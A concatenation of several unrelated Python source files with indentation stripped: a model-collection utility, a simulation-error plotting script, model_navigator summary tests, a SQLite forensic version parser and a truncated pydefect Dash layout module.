# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import itertools
from types import GeneratorType
from .base import Model, UserFriendlyObject
from .base import COLLECTION_TYPES
from typing import Iterable
from typing import Callable
from ordered_set import OrderedSet
from humanfriendly.tables import format_robust_table, format_pretty_table
from . import typing as internal_typing
ITERABLES = (list, tuple, itertools.chain, set, map, filter, GeneratorType)
def is_iterable(values) -> bool:
return any(
[
isinstance(values, ITERABLES + (IterableCollection,)),
callable(getattr(values, "__iter__", None)),
]
)
class IterableCollection(UserFriendlyObject):
"""Base mixin for ModelList and ModelSet, provides methods to
manipulate iterable collections in ways take advantage of the
behavior of models.
For example it supports filtering by instance attributes through a cal to the
:py:meth:`~uiclasses.base.Model.attribute_matches` method of each children.
**Features:**
- :py:meth:`~uiclasses.collections.IterableCollection.sorted_by` - sort by a single attribute
- :py:meth:`~uiclasses.collections.IterableCollection.filter_by` - to filter by a single attribute
- :py:meth:`~uiclasses.collections.IterableCollection.sorted` - alias to ``MyModel.List(sorted(my_model_collection))`` or ``.Set()``
- :py:meth:`~uiclasses.collections.IterableCollection.filter` - alias to ``MyModel.List(filter(callback, my_model_collection))``
- :py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
- :py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`
"""
__visible_attributes__ = ["model_class"]
def __repr__(self):
return f"<{self.__ui_name__()} {list(self)}>"
def __str__(self):
return f"{self.__ui_name__()}[length={len(self)}]"
def sorted(self, **kw):
"""returns a new ``ModelList`` with this collections' children sorted.
Example:
.. code::
x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
result = x.sorted(key=lambda model: model.id)
"""
items = sorted(self, **kw)
return self.__class__(items)
def sorted_by(self, attribute: str, **kw):
"""sort by a single attribute of the model children.
Example:
.. code::
x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
result = x.sorted_by('id')
"""
return self.sorted(
key=lambda model: getattr(model, attribute, model.get(attribute))
or "",
**kw,
)
def filter_by(
self, attribute_name: str, fnmatch_pattern: str
) -> internal_typing.IterableCollection[Model]:
"""filter by a single attribute of the model children.
Example:
.. code::
x = MyModel.List([MyModel({"name": 'chucknorris'}), MyModel({"name": 'foobar'})])
result = x.filter_by('name', '*norris*')
"""
return self.filter(
lambda model: model.attribute_matches(
attribute_name, fnmatch_pattern
)
)
def filter(self, check: Callable[[Model], bool]) -> Iterable[Model]:
"""returns a new ``ModelList`` with this collections' children filter.
Example:
.. code::
x = MyModel.List([MyModel({"id": 2}), MyModel({"id": 3})])
result = x.filter(key=lambda model: model.id)
"""
results = filter(check, self)
return self.__class__(results)
def get_table_columns(self, columns: Iterable[str] = None):
"""proxy to :py:meth:`~uiclasses.base.Model.get_table_columns`
"""
available_columns = self.__of_model__.__visible_attributes__
if not isinstance(columns, list):
return available_columns
return self.validate_columns(columns)
def get_table_rows(self, columns: Iterable[str] = None):
"""returns a list of values from the __ui_attributes__ of each child of this collection.
Used by
:py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
and
:py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`.
"""
columns = self.get_table_columns(columns)
return [
[model.__ui_attributes__().get(key) for key in columns]
for model in self
]
def get_table_columns_and_rows(self, columns: Iterable[str] = None):
"""returns a 2-item tuple with columns names and row values of each
child of this collection.
Used by
:py:meth:`~uiclasses.collections.IterableCollection.format_robust_table`
and
:py:meth:`~uiclasses.collections.IterableCollection.format_pretty_table`.
"""
columns = self.get_table_columns(columns)
rows = self.get_table_rows(columns)
return columns, rows
def format_robust_table(self, columns: Iterable[str] = None):
"""returns a string with a robust table ready to be printed on a terminal.
powered by :py:func:`humanfriendly.tables.format_robust_table`
"""
columns, rows = self.get_table_columns_and_rows(columns)
return format_robust_table(rows, columns)
def format_pretty_table(self, columns: Iterable[str] = None):
"""returns a string with a pretty table ready to be printed on a terminal.
powered by :py:func:`humanfriendly.tables.format_pretty_table`
"""
columns, rows = self.get_table_columns_and_rows(columns)
return format_pretty_table(rows, columns)
def validate_columns(self, columns):
mismatched_columns = set(columns).difference(
self.__of_model__.__visible_attributes__
)
if mismatched_columns:
raise ValueError(
f"the following columns are not available "
f"for {self.__of_model__}: {mismatched_columns}"
)
return columns
def to_dict(self, only_visible: bool = False) -> Iterable[dict]:
"""calls ``.to_dict()`` in each children of this collection."""
return [m.to_dict(only_visible=only_visible) for m in self]
def serialize(self, only_visible: bool = False) -> Iterable[dict]:
"""calls ``.serialize()`` in each children of this collection."""
return [m.serialize(only_visible=only_visible) for m in self]
def serialize_visible(self) -> Iterable[dict]:
"""calls ``.serialize_visible()`` in each children of this collection."""
return [m.serialize_visible() for m in self]
def serialize_all(self) -> Iterable[dict]:
"""calls ``.serialize_all()`` in each children of this collection."""
return [m.serialize_all() for m in self]
class ModelList(list, IterableCollection):
"""Implementation of :py:class:`~uiclasses.collections.IterableCollection` for the
:py:class:`list` type.
"""
def __init__(self, children: Iterable[Model]):
model_class = self.__of_model__
if not is_iterable(children):
raise TypeError(
f"{self.__class__.__name__} requires the 'children' attribute to be "
f"a valid iterable, got {children!r} {type(children)} instead"
)
items = []
for index, child in enumerate(children):
if isinstance(child, dict):
child = self.__of_model__(child)
if not isinstance(child, model_class):
raise TypeError(
f"cannot create {self.__class__.__name__} because value at index [{index}] is not a {model_class}: {child!r} {type(child)}"
)
items.append(child)
super().__init__(map(model_class, items))
def unique(self) -> "ModelSet":
"""returns a :py:class:`~uiclasses.collections.ModelSet` of all unique items in this :py:class:`~uiclasses.collections.ModelList`"""
return self.__of_model__.Set(self)
class ModelSet(OrderedSet, IterableCollection):
"""Implementation of :py:class:`~uiclasses.collections.IterableCollection` for the
`OrderedSet <https://pypi.org/project/ordered-set/>`_ type.
"""
def __init__(self, children: Iterable[Model]):
model_class = getattr(self, "__of_model__", None)
if not is_iterable(children):
raise TypeError(
f"{self.__class__.__name__} requires the 'children' attribute to be "
f"a valid iterable, got {children!r} {type(children)} instead"
)
items = []
for index, child in enumerate(children):
if isinstance(child, dict):
child = self.__of_model__(child)
if not isinstance(child, model_class):
raise TypeError(
f"cannot create {self.__class__.__name__} because value at index [{index}] is not a {model_class}: {child!r} {type(child)}"
)
items.append(child)
super().__init__(map(model_class, items))
COLLECTION_TYPES[iter] = IterableCollection
COLLECTION_TYPES[list] = ModelList
COLLECTION_TYPES[set] = ModelSet
COLLECTION_TYPES[OrderedSet] = ModelSet
|
import sessionFuncs as sf
import dataProcessing as dp
import numpy as np
import scipy.stats as stats
import matplotlib as mpl
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
from types import *
class PSCCompAnalysis(object):
def __init__(self, simIds):
self.sims = simIds
self.sif = 'K1'
self.dists = ['norm', 't']
self.errType = 'difference'
self.dKeys = ['smaller', 'equal', 'larger']
self.errs = {key: np.array([]) for key in self.dKeys}
self.simIds = {key: set() for key in self.dKeys}
def divideSimIds(self, limD, limH):
self.d = limD
self.h = limH
for s in self.sims:
ad = dp.AnalysisData(s)
ad.calcAnSol()
ad.calculateStats()
simD = ad.getContainerDiam()
simH = ad.getContainerHeight()
errs = ad.getErrorReports()[self.errType][self.sif]
if simD == limD and simH == limH:
key = self.dKeys[1]
elif simD >= limD and simH >= limH:
key = self.dKeys[2]
else:
key = self.dKeys[0]
self.simIds[key].add(s)
self.errs[key] = np.concatenate((self.errs[key], errs))
def delEmptySimIdClassificationSets(self):
for k in self.dKeys:
if len(self.simIds[k]) == 0:
del self.simIds[k]
del self.errs[k]
def manipulateErrors(self):
for k in self.errs.keys():
avg = np.average(self.errs[k])
self.errs[k] = [e for e in self.errs[k] if (
(e <= avg + self.lim) and (e >= avg - self.lim))]
def createFigureAxes(self):
self.axes = []
ncols = 1
nrows = len(self.simIds)
gs = mpl.gridspec.GridSpec(nrows=nrows, ncols=ncols)
gs.update(wspace=0.04, hspace=0.08)
for i in range(ncols * nrows):
self.axes.append(self.fig.add_subplot(gs[i]))
self.axes[i].grid(True)
def createPSCStatPlots(self, limD, limH, bins, lim, fig):
self.limD = limD
self.limH = limH
self.axes = []
self.fig = fig
self.lim = lim
self.bins = bins
self.divideSimIds(limD, limH)
self.delEmptySimIdClassificationSets()
self.manipulateErrors()
self.createFigureAxes()
i = 0
for k in self.dKeys:
if k in self.simIds:
self.createPSCHistProbPlots(i, k)
i += 1
self.axes[-1].set_xlabel('errors difference')
def createPSCHistProbPlots(self, i, key):
errs = self.errs[key]
x = np.arange(min(errs), max(errs), 0.1)
mu, sigma = stats.norm.fit(errs)
normpdf = stats.norm.pdf(x, mu, sigma)
shape, loc, scale = stats.t.fit(errs)
rv = stats.t(shape, loc=loc, scale=scale)
self.axes[i].hist(errs, self.bins, normed=True,
color='MidnightBlue', alpha=0.7,
label='Errors {0}'.format(self.sif))
self.axes[i].plot(x, normpdf,
'r', label='Normal fit')
self.axes[i].plot(x, rv.pdf(x),
'g', label='T fit')
text = self.getContainerDescription(key)
self.axes[i].text(0.01, 0.9, text,
transform=self.axes[i].transAxes,
fontsize=14)
self.axes[i].text(0.01, 0.7,
'$\mu=${0:.3}\n$\sigma=${1:.3}'.format(mu, sigma),
transform=self.axes[i].transAxes,
fontsize=14)
h, l = self.axes[i].get_legend_handles_labels()
self.axes[i].legend(h, l)
self.axes[i].set_ylabel('Probability')
self.axes[i].set_xlim((-self.lim, self.lim))
def createPSCProbPlots(self, i, fig):
i = i - 1
keys = []
for k in self.dKeys:
if k in self.simIds:
keys.append(k)
errs = self.errs[keys[i]]
text = self.getContainerDescription(keys[i])
fig.suptitle(text, fontsize=14)
mu, sigma = stats.norm.fit(errs)
shape, loc, scale = stats.t.fit(errs)
for i in range(len(self.dists)):
dist = self.dists[i]
ax = PLTAxes(fig.add_subplot(len(self.dists), 1, i + 1))
if dist == 'norm':
stats.probplot(errs, dist='norm', fit=True, plot=ax)
ax.title('Normal probability plot')
elif dist == 't':
stats.probplot(errs, dist='t', fit=True,
sparams=(loc, scale),
plot=ax)
ax.title('T probability plot')
def getContainerDescription(self, key):
if key == 'smaller':
d = '<{0}'.format(self.limD)
h = '<{0}'.format(self.limH)
elif key == 'equal':
d = '={0}'.format(self.limD)
h = '={0}'.format(self.limH)
else:
d = '>{0}'.format(self.limD)
h = '>{0}'.format(self.limH)
text = 'Container d{0}, h{1}'.format(d, h)
return text
class PLTAxes(object):
def __init__(self, axes):
self.axes = axes
self.axes.grid(True)
def plot(self, *args, **kargs):
createPlot = True
for arg in args:
if isinstance(arg, (np.ndarray,)):
if np.isnan(np.min(arg)):
createPlot = False
if createPlot:
self.axes.plot(*args, **kargs)
def title(self, *args):
self.axes.set_title(args[0])
def xlabel(self, *args):
self.axes.set_xlabel(args[0])
def ylabel(self, *args):
self.axes.set_ylabel(args[0])
def text(self, *args):
self.axes.text(args[0], args[1], args[2])
def assignSimIdAsFailed(trees, cq, selIdNum):
if isinstance(selIdNum, NoneType):
pass
elif selIdNum in cq.getQueueDict().keys():
simId = cq.getQueueDict()[selIdNum]
cq.removeSimIdFromQueue(simId)
sf.writeToShelve(simId, 'failed')
sf.setSimIdAsFailed(trees, [simId])
print simId
else:
print 'Verify the selIdNum argument value'
|
<reponame>triton-inference-server/model_navigator<gh_stars>10-100
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
from model_navigator.model_analyzer.config import ModelAnalyzerAnalysisConfig
from model_navigator.model_analyzer.summary import Summary
from model_navigator.record.types.perf_latency import PerfLatency
from model_navigator.record.types.perf_throughput import PerfThroughput
FILES_DIR = Path(__file__).parent.parent.absolute() / "files"
def test_filter_results():
config = ModelAnalyzerAnalysisConfig()
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
results = summary._rows_from_csv(file_path=results_file)
metrics = summary._rows_from_csv(file_path=metrics_file)
filtered_results = summary._filter(results)
filtered_metrics = summary._filter(metrics)
assert len(filtered_results) == 10
assert len(filtered_metrics) == 10
def test_top_results_perf():
config = ModelAnalyzerAnalysisConfig()
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
results = summary._rows_from_csv(file_path=results_file)
metrics = summary._rows_from_csv(file_path=metrics_file)
filtered_results = summary._filter(results)
top_results = summary._top_results(filtered_results)
top_metrics = summary._top_metrics(metrics, top_results)
assert config.top_n_configs == 3
assert len(top_results) == 3
assert len(top_metrics) == 3
for idx in range(1, len(top_results)):
assert top_results[idx - 1][PerfThroughput.header()] >= top_results[idx][PerfThroughput.header()]
def test_top_results_latency():
config = ModelAnalyzerAnalysisConfig()
config.objectives = {"perf_latency": 10}
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
results = summary._rows_from_csv(file_path=results_file)
metrics = summary._rows_from_csv(file_path=metrics_file)
filtered_results = summary._filter(results)
top_results = summary._top_results(filtered_results)
top_metrics = summary._top_metrics(metrics, top_results)
assert config.top_n_configs == 3
assert len(top_results) == 3
assert len(top_metrics) == 3
for idx in range(1, len(top_results)):
assert top_results[idx - 1][PerfLatency.header()] <= top_results[idx][PerfLatency.header()]
def test_top_results_wighted():
config = ModelAnalyzerAnalysisConfig()
config.objectives = {"perf_throughput": 10, "perf_latency": 5}
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
results = summary._rows_from_csv(file_path=results_file)
metrics = summary._rows_from_csv(file_path=metrics_file)
filtered_results = summary._filter(results)
top_results = summary._top_results(filtered_results)
top_metrics = summary._top_metrics(metrics, top_results)
assert config.top_n_configs == 3
assert len(top_results) == 3
assert len(top_metrics) == 3
# 1st choice
assert top_results[0][PerfLatency.header()] <= top_results[1][PerfLatency.header()]
assert top_results[0][PerfThroughput.header()] <= top_results[1][PerfThroughput.header()]
# 2nd choice
assert top_results[1][PerfLatency.header()] <= top_results[2][PerfLatency.header()]
assert top_results[1][PerfThroughput.header()] >= top_results[2][PerfThroughput.header()]
def test_prepare_results():
config = ModelAnalyzerAnalysisConfig()
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
summary._prepare()
assert config.top_n_configs == 3
assert len(summary.get_results()) == config.top_n_configs
assert len(summary.get_metrics()) == config.top_n_configs
def test_print_results():
config = ModelAnalyzerAnalysisConfig()
config.objectives = {"perf_throughput": 10, "perf_latency": 5}
results_file = FILES_DIR / "results.csv"
metrics_file = FILES_DIR / "metrics.csv"
summary = Summary(results_path=results_file, metrics_path=metrics_file, analysis_config=config)
summary.show()
|
<gh_stars>10-100
from abc import ABCMeta
from logging import getLogger
from re import sub
from warnings import warn
from sqlite_dissect.constants import BASE_VERSION_NUMBER
from sqlite_dissect.constants import LOGGER_NAME
from sqlite_dissect.constants import MASTER_SCHEMA_ROW_TYPE
from sqlite_dissect.constants import PAGE_TYPE
from sqlite_dissect.exception import VersionParsingError
from sqlite_dissect.file.schema.master import OrdinaryTableRow
from sqlite_dissect.file.schema.master import VirtualTableRow
"""
version_parser.py
This script holds the objects for parsing through the version history for master schema entries. This can be used
for retrieving cells (records), carving, signature generation, etc..
This script holds the following object(s):
VersionParser(object)
"""
class VersionParser(object):
__metaclass__ = ABCMeta
def __init__(self, version_history, master_schema_entry, version_number=None, ending_version_number=None):
"""
The version history will be iterated through and the respective subclass will use the master schema entry
parsed from every version where that master schema entry is found. The version numbers where the master schema
entry is found until the last version it is found in (if applicable) will be set at the parser starting version
number and parser ending version number.
In addition, the version number may be set for a specific version to be parsed. This way if you only want a
specific version to be parsed, you can specify the version number. If you want the range between two specific
versions, the version number and ending version number can be specified to parse the versions in between
(including the specified version number and ending version number). If these fields are set the parser
starting and ending version number will be set accordingly to be within the range of these versions, if
existing, otherwise None. If the master schema entry does not exist in between the versions, a warning will
be raised and the subclass will handle the use case accordingly (either by creating and empty object(s) or a
"empty" class depending on implementation).
The md5_hash_identifier field is used from the master schema entry to identify it across the versions. Due
to this, it does not matter what master schema entry from what version you choose. The md5_hash_identifier
is derived from the row id, name, table name, type, and sql to ensure uniqueness. (Root page numbers can be
updated.)
Note: The use case where the same master schema entry is removed and re-added needs to be addressed in the wal
file and is not fully supported here.
:param version_history:
:param master_schema_entry:
:param version_number:
:param ending_version_number:
:return:
:raise:
"""
logger = getLogger(LOGGER_NAME)
if version_number is None and ending_version_number:
log_message = "Version number not specified where ending version number was specified as: {} for " \
"master schema entry with root page number: {} row type: {} name: {} table name: {} " \
"and sql: {}."
log_message = log_message.format(ending_version_number, master_schema_entry.root_page_number,
master_schema_entry.row_type, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.error(log_message)
raise ValueError(log_message)
if version_number is not None and version_number == ending_version_number:
log_message = "Version number: {} specified where ending version number was also specified as: {} for " \
"master schema entry with root page number: {} row type: {} name: {} table name: {} and " \
"sql: {}."
log_message = log_message.format(version_number, ending_version_number,
master_schema_entry.root_page_number, master_schema_entry.row_type,
master_schema_entry.name, master_schema_entry.table_name,
master_schema_entry.sql)
logger.error(log_message)
raise ValueError(log_message)
number_of_versions = version_history.number_of_versions
"""
The ending version number needs to be less than the number of versions since version numbers start from
0 and go to the last version. Therefore, the number of versions will be one greater than the last version
number.
"""
if ending_version_number is not None and (ending_version_number >= number_of_versions or
ending_version_number <= version_number):
log_message = "Invalid ending version number: {} with {} number of versions with version number: {} for " \
"master schema entry with root page number: {} row type: {} name: {} table name: {} " \
"and sql: {}."
log_message = log_message.format(ending_version_number, number_of_versions, version_number,
master_schema_entry.root_page_number, master_schema_entry.row_type,
master_schema_entry.name, master_schema_entry.table_name,
master_schema_entry.sql)
logger.error(log_message)
raise ValueError(log_message)
self.version_number = version_number
self.ending_version_number = ending_version_number
self.parser_starting_version_number = version_number if version_number is not None else BASE_VERSION_NUMBER
self.parser_ending_version_number = ending_version_number \
if ending_version_number is not None else number_of_versions - 1
"""
According to the sqlite documentation the only pages with a root page are table and index types (excluding
virtual tables.) Therefore we can only parse cells from these types. In the case that trigger or
view master schema entry row types were specified we raise a warning here. This will result in having a
no entries to parse through.
Note: Support for virtual table modules that may or may not have database b-tree pages need to be accounted
for. A warning will be displayed if a virtual table is encountered.
Note: Support for "without rowid" tables are not accounted for properly. For now, a warning will be displayed.
"""
if master_schema_entry.row_type not in [MASTER_SCHEMA_ROW_TYPE.TABLE, MASTER_SCHEMA_ROW_TYPE.INDEX]:
log_message = "Invalid master schema entry row type: {} for master schema entry with root page " \
"number: {} name: {} table name: {} and sql: {}. Only table and index master " \
"schema entries have associated cells to be parsed."
log_message = log_message.format(master_schema_entry.row_type, master_schema_entry.root_page_number,
master_schema_entry.name, master_schema_entry.table_name,
master_schema_entry.sql)
logger.warn(log_message)
warn(log_message, RuntimeWarning)
# Set the page type and update it as appropriate
self.page_type = PAGE_TYPE.B_TREE_TABLE_LEAF
if isinstance(master_schema_entry, VirtualTableRow):
log_message = "A virtual table row type was found for the version parser which is not fully supported " \
"for master schema entry root page number: {} type: {} name: {} table name: {} and sql: {}."
log_message = log_message.format(master_schema_entry.root_page_number,
master_schema_entry.row_type, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.warn(log_message)
warn(log_message, RuntimeWarning)
elif isinstance(master_schema_entry, OrdinaryTableRow) and master_schema_entry.without_row_id:
log_message = "A \"without rowid\" table row type was found for the version parser which is not " \
"supported for master schema entry root page number: {} row type: {} name: {} " \
"table name: {} and sql: {}. Erroneous cells may be generated."
log_message = log_message.format(master_schema_entry.root_page_number,
master_schema_entry.row_type, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.warn(log_message)
warn(log_message, RuntimeWarning)
self.page_type = PAGE_TYPE.B_TREE_INDEX_LEAF
# Set the page type if the master schema row type is a index
if master_schema_entry.row_type == MASTER_SCHEMA_ROW_TYPE.INDEX:
self.page_type = PAGE_TYPE.B_TREE_INDEX_LEAF
"""
Set the master schema entry fields we care about in this class. Since root page numbers can be different
depending on versions, root page numbers is a dictionary in the form of:
root_page_number_version_index[VERSION_NUMBER] = ROOT_PAGE_NUMBER(VERSION)
"""
self.row_type = master_schema_entry.row_type
self.name = master_schema_entry.name
self.table_name = master_schema_entry.table_name
self.sql = master_schema_entry.sql
self.root_page_number_version_index = {}
# Get the md5_hash_identifier from the master schema entry
self.master_schema_entry_md5_hash_identifier = master_schema_entry.md5_hash_identifier
"""
Setup the version numbers to parse through for the version history.
Note: If the master schema entry is either not found, or stops being found and then re-found, a warning will
be raised. The master schema entry uniqueness is determined by the master schema entry md5 hash
identifier from the MasterSchemaRow class.
"""
versions = version_history.versions
starting_version_number = None
ending_version_number = None
for version_number in range(self.parser_starting_version_number, self.parser_ending_version_number + 1):
version = versions[version_number]
if version.master_schema_modified:
master_schema = version.master_schema
else:
master_schema = version.last_master_schema
if not master_schema:
log_message = "Master schema was unable to be found in starting version number: {} while parsing " \
"the version history for master schema entry with name: {} table name: {} " \
"row type: {} and sql: {} for version number: {} and ending version number: {}."
log_message = log_message.format(version_number, self.name, self.table_name, self.row_type, self.sql,
self.parser_starting_version_number,
self.parser_ending_version_number)
logger.error(log_message)
raise VersionParsingError(log_message)
entries = master_schema.master_schema_entries
entries_dictionary = dict(map(lambda entry: [entry.md5_hash_identifier, entry], entries))
if self.master_schema_entry_md5_hash_identifier in entries_dictionary:
if ending_version_number is None:
if starting_version_number is not None:
log_message = "The starting version number was set already when it should not have been " \
"since the ending version number was still not set for master schema entry " \
"row type: {} with root page number: {} name: {} table name: {} and sql: {}."
log_message = log_message.format(master_schema_entry.row_type,
master_schema_entry.root_page_number, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.error(log_message)
raise VersionParsingError(log_message)
starting_version_number = version_number
ending_version_number = version_number
if self.root_page_number_version_index:
log_message = "The root page number version index has already been populated with values " \
"when it should not have been for master schema entry row type: {} with root " \
"page number: {} name: {} table name: {} and sql: {}."
log_message = log_message.format(master_schema_entry.row_type,
master_schema_entry.root_page_number, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.error(log_message)
raise VersionParsingError(log_message)
# Add the first version number and b-tree root page number into the root page number version index
root_page_number = entries_dictionary[self.master_schema_entry_md5_hash_identifier].root_page_number
self.root_page_number_version_index[version_number] = root_page_number
elif ending_version_number == version_number - 1:
ending_version_number = version_number
if not self.root_page_number_version_index:
log_message = "The root page number version index has not already been populated with values " \
"when it should have been for master schema entry row type: {} with root " \
"page number: {} name: {} table name: {} and sql: {}."
log_message = log_message.format(master_schema_entry.row_type,
master_schema_entry.root_page_number, master_schema_entry.name,
master_schema_entry.table_name, master_schema_entry.sql)
logger.error(log_message)
raise VersionParsingError(log_message)
# Add the version number and b-tree root page number into the root page number version index
root_page_number = entries_dictionary[self.master_schema_entry_md5_hash_identifier].root_page_number
self.root_page_number_version_index[version_number] = root_page_number
else:
log_message = "Version number: {} did not have a master schema entry for the previous " \
"version number for master schema entry with name: {} table name: {} " \
"row type: {} and sql: {} for version number: {} and ending version number: {}."
log_message = log_message.format(version_number, self.name, self.table_name, self.row_type,
self.sql, self.parser_starting_version_number,
self.parser_ending_version_number)
logger.warn(log_message)
warn(log_message, RuntimeWarning)
if starting_version_number is None and ending_version_number is None:
log_message = "Was unable to find any matching schema entries between version numbers {} " \
"and {}. The version parser will not parse anything for master schema entry with " \
"name: {} table name: {} row type: {} and sql: {}."
log_message = log_message.format(self.parser_starting_version_number,
self.parser_ending_version_number, self.name, self.table_name,
self.row_type, self.sql)
logger.warn(log_message)
warn(log_message, RuntimeWarning)
self.parser_starting_version_number = starting_version_number
self.parser_ending_version_number = ending_version_number
"""
We now have the parser starting and ending version numbers that we need to parse between and a root
page number version index referring to each version and it's root b-tree page in case it was updated.
Note: The root pages to the master schema entries are generated on demand from the version which will return
the b-tree page if it is already in memory, or parse it and then return it if it is not. Versions can
either be stored in memory or read out on demand for b-tree pages. This is allowed for conserving
memory and speeding up parsing (so each b-tree page does not need to be parsed in the case where
they do not change).
"""
def __repr__(self):
return self.__str__().encode("hex")
def __str__(self):
return sub("\t", "", sub("\n", " ", self.stringify()))
def stringify(self, padding=""):
string = padding + "Row Type: {}\n" \
+ padding + "Page Type: {}\n" \
+ padding + "Name: {}\n" \
+ padding + "Table Name: {}\n" \
+ padding + "SQL: {}\n" \
+ padding + "Root Page Number Version Index: {}\n" \
+ padding + "Master Schema Entry MD5 Hash Identifier: {}\n" \
+ padding + "Version Number: {}\n" \
+ padding + "Ending Version Number: {}\n" \
+ padding + "Parser Starting Version Number: {}\n" \
+ padding + "Parser Ending Version Number: {}"
string = string.format(self.row_type,
self.page_type,
self.name,
self.table_name,
self.sql,
self.root_page_number_version_index,
self.master_schema_entry_md5_hash_identifier,
self.version_number,
self.ending_version_number,
self.parser_starting_version_number,
self.parser_ending_version_number)
return string
|
<filename>pydefect/analyzer/dash_components/main.py
# coding: utf-8
# Copyright (c) 2020 Kumagai group.
import argparse
import sys
from pathlib import Path
import crystal_toolkit.components as ctc
from crystal_toolkit.helpers.layouts import *
from dash import Dash
from pydefect.analyzer.calc_results import CalcResults
from pydefect.analyzer.dash_components.cpd_energy_dash import \
CpdEnergy2D3DComponent, CpdEnergyOtherComponent
from pydefect.analyzer.dash_components.scenes_from_volumetric_data import \
SceneDicts
from pydefect.analyzer.dash_components.single_defect_component import \
SingleDefectComponent
from pydefect.analyzer.dash_components.supercell_component import \
SupercellComponent
from pydefect.analyzer.eigenvalue_plotter import EigenvaluePlotlyPlotter
from pydefect.chem_pot_diag.chem_pot_diag import CpdPlotInfo, ChemPotDiag
from pydefect.corrections.site_potential_plotter import \
SitePotentialPlotlyPlotter
from pydefect.defaults import defaults
from pydefect.input_maker.defect_entry import DefectEntry
from pymatgen import Structure
from vise.analyzer.dash_components.band_dos_dash import BandDosComponent
from vise.analyzer.dash_components.main import symmetry_layout, site_layout, \
mpid_and_link
from vise.analyzer.dash_components.structure_component import StructureComponent
from vise.util.structure_symmetrizer import StructureSymmetrizer
app = Dash(suppress_callback_exceptions=True,
assets_folder=SETTINGS.ASSETS_PATH)
def create_ctk(struct_component,
crystal_symmetry,
mpid_and_link,
sites,
band_dos_component,
supercell_component_layout,
cpd_energy_layout,
single_defect_layouts):
box_size = "30vmin"
supercell = Column(
[
Box(
supercell_component_layout,
style={
"width": box_size,
"height": box_size,
"minWidth": "300px",
"minHeight": "300px",
"maxWidth": "600px",
"maxHeight": "600px",
"overflow": "hidden",
"padding": "0.25rem",
"marginBottom": "0.5rem",
},
),
],
narrow=True,
)
_layout = Container(
[
Section(
[
Columns(
[
Column(
[struct_component.title_layout()]
)
]
),
Columns(
[
Column(
[
Box(
struct_component.layout(size="100%"),
style={
"width": box_size,
"height": box_size,
"minWidth": "300px",
"minHeight": "300px",
"maxWidth": "800px",
"maxHeight": "800px",
"overflow": "hidden",
"padding": "0.25rem",
"marginBottom": "0.5rem",
},
),
html.Div(
[
html.Div(
struct_component.legend_layout(),
style={"float": "left"},
),
],
style={
"width": box_size,
"minWidth": "300px",
"marginBottom": "40px",
},
),
],
narrow=True,
),
Column(
[crystal_symmetry, mpid_and_link],
style={"width": box_size, "max-width": box_size},
),
],
desktop_only=False,
centered=False,
),
Columns(Column([sites])),
]
),
Section([band_dos_component.layout()]
),
Section([Columns(cpd_energy_layout + [supercell]),
Column(single_defect_layouts)])
]
)
return _layout
def make_layouts(structure: Structure, dos_plot_data, band_plot_data,
perfect_dirname, defect_dirnames, supercell_info, chem_pot_diag):
cpd_plot_info = CpdPlotInfo(ChemPotDiag.from_yaml(chem_pot_diag))
perfect: CalcResults = loadfn(perfect_dirname / "calc_results.json")
defects, defect_entries, corrections, single_defect_layouts = [], [], [], []
for d in defect_dirnames:
#TODO: check convergence
defects.append(loadfn(d / "calc_results.json"))
defect_entry = loadfn(d / "defect_entry.json")
defect_entries.append(defect_entry)
corrections.append(loadfn(d / "correction.json"))
defect_entry: DefectEntry = loadfn(d / "defect_entry.json")
efnv_correction = loadfn(d / "correction.json")
eigval = loadfn(d / "band_edge_eigenvalues.json")
pot = SitePotentialPlotlyPlotter(title=defect_entry.full_name,
efnv_correction=efnv_correction)
eig = EigenvaluePlotlyPlotter(title=defect_entry.full_name,
